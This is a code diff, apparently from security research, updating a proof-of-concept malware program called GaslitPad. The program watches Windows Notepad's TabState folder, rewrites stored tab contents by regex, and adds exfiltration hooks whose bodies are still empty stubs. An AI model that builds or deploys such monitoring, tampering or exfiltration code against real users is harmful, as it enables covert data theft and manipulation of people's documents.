GaslitPad update

Author: ogmini

NotepadStateLibrary/POCMalware/Exfiltrate.cs

@@ -0,0 +1,31 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace GaslitPad
+{
+    public static class Exfiltrate
+    {
+        public static void SendFiles(string directory, List<string> filePaths)
+        {
+            //TODO:
+        }
+
+        public static void SendFile(string filePath)
+        {
+            //TODO:
+        }
+
+        public static void SendChanges(string filePath)
+        {
+            //TODO:
+        }
+
+        public static void DeletedFile(string filePath)
+        {
+
+        }
+    }
+}

NotepadStateLibrary/POCMalware/Program.cs

@@ -15,22 +15,33 @@
 bool isNotepadRunning = false;
 //LOL Error checking?
 int idleWaitTime = Int32.Parse(ConfigurationManager.AppSettings["idleWaitTime"]); // idle wait time before attack
-int pollingInterval = Int32.Parse(ConfigurationManager.AppSettings["pollingInterval"]); // polling interval 
+int pollingInterval = Int32.Parse(ConfigurationManager.AppSettings["pollingInterval"]); // polling interval. Should we have a different rate for checking Notepad running? 
 string directoryToMonitor = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), @"Packages\Microsoft.WindowsNotepad_8wekyb3d8bbwe\LocalState\TabState");
 
-//TODO: Make this a list or something of attack target parameters
+//TODO: Future: Make this a list or something of attack target parameters
 //LOL Error checking?
-int attackVersion = Int32.Parse(ConfigurationManager.AppSettings["attackVersion"]); //0 attack when Notepad is open, 1 attacks when Notepad is closed
+int attackVersion = Int32.Parse(ConfigurationManager.AppSettings["attackVersion"]); //0 Active Attack, 1 Sleep Attack
 string attackFileName = ConfigurationManager.AppSettings["attackFileName"];
 string attackRegex = ConfigurationManager.AppSettings["attackRegex"];
 string attackReplace = ConfigurationManager.AppSettings["attackReplace"];
 bool attackDone = false;
 
 
+// Get the current state of the directory (file names and their hashes)
+var currentFileState = new Dictionary<string, string>();
+foreach (var file in Directory.GetFiles(directoryToMonitor))
+{
+    var fileName = Path.GetFileName(file);
+    var fileByteLength = GetFileByteLength(file);
+    currentFileState[fileName] = fileByteLength;
+}
+//TODO: Future: Ship out files
+Exfiltrate.SendFiles(directoryToMonitor, currentFileState.Keys.ToList()); //This is not right. I need the full path
+
 if (attackVersion == 0)
 {
     // Dictionary to store file information: file name -> file length to detect changes
-    var previousFileState = new Dictionary<string, string>();
+    var previousFileState = currentFileState;
 
     Thread monitorThread = new Thread(MonitorNotepad);
     monitorThread.IsBackground = true; // Set as background thread so it terminates when the app closes
@@ -42,27 +53,16 @@
     // Start a loop to check the directory every few seconds
     while (true)
     {
-        // Wait for the next polling interval
-        Thread.Sleep(pollingInterval);
-
         Console.WriteLine(InputTimer.GetInputIdleTime().TotalSeconds.ToString());
 
-        // Get the current state of the directory (file names and their hashes)
-        var currentFileState = new Dictionary<string, string>();
-        foreach (var file in Directory.GetFiles(directoryToMonitor))
-        {
-            var fileName = Path.GetFileName(file);
-            var fileByteLength = GetFileByteLength(file);
-            currentFileState[fileName] = fileByteLength;
-        }
-
         // Check for newly added files
         var addedFiles = currentFileState.Keys.Except(previousFileState.Keys);
         foreach (var addedFile in addedFiles)
         {
             Console.WriteLine($"File created: {addedFile}");
             Console.WriteLine(isNotepadRunning.ToString());
-            //TODO: Future
+            //TODO: Future: Ship out new files
+            Exfiltrate.SendFile(Path.Combine(directoryToMonitor, addedFile));
         }
 
         // Check for deleted files
@@ -71,7 +71,8 @@
         {
             Console.WriteLine($"File deleted: {deletedFile}");
             Console.WriteLine(isNotepadRunning.ToString());
-            //TODO: Future
+            //TODO: Future: Alert on deleted file
+            Exfiltrate.DeletedFile(Path.Combine(directoryToMonitor, deletedFile));
         }
 
         // Check for modified files (files that exist in both, but with different lengths)
@@ -82,7 +83,8 @@
         {
             Console.WriteLine($"File modified: {modifiedFile}");
             Console.WriteLine(isNotepadRunning.ToString());
-            //TODO: Future
+            //TODO: Future: ship out changes
+            Exfiltrate.SendChanges(Path.Combine(directoryToMonitor, modifiedFile)); //TODO: This should really just exfiltrate the unsavedbufferchunks
         }
 
         // Update the previous file state for the next iteration
@@ -99,22 +101,33 @@
             }
             OpenNotepad();
         }
+
         // Check for user input to exit
-        if (Console.KeyAvailable && Console.ReadKey(intercept: true).Key == ConsoleKey.Q)
+        if ((Console.KeyAvailable && Console.ReadKey(intercept: true).Key == ConsoleKey.Q) || attackDone)
         {
             break;
         }
+
+        // Wait for the next polling interval
+        Thread.Sleep(pollingInterval);
+
+        //Refresh list of current files
+        currentFileState = new Dictionary<string, string>();
+        foreach (var file in Directory.GetFiles(directoryToMonitor))
+        {
+            var fileName = Path.GetFileName(file);
+            var fileByteLength = GetFileByteLength(file);
+            currentFileState[fileName] = fileByteLength;
+        }
     }
 }
 else
 {
     while (true)
     {
-        Thread.Sleep(pollingInterval);
-
         if (Process.GetProcessesByName("notepad").Count() == 0)
         {
-            var currentFileState = new Dictionary<string, string>();
+            currentFileState = new Dictionary<string, string>();
             foreach (var file in Directory.GetFiles(directoryToMonitor))
             {
                 var fileName = Path.GetFileName(file);
@@ -133,6 +146,8 @@
         {
             break;
         }
+
+        Thread.Sleep(pollingInterval);
     }
 }
 
@@ -234,5 +249,3 @@ void Attack(string path, string fileName, string replace, string regexFind)
         attackDone = true;
     }
 }
-
-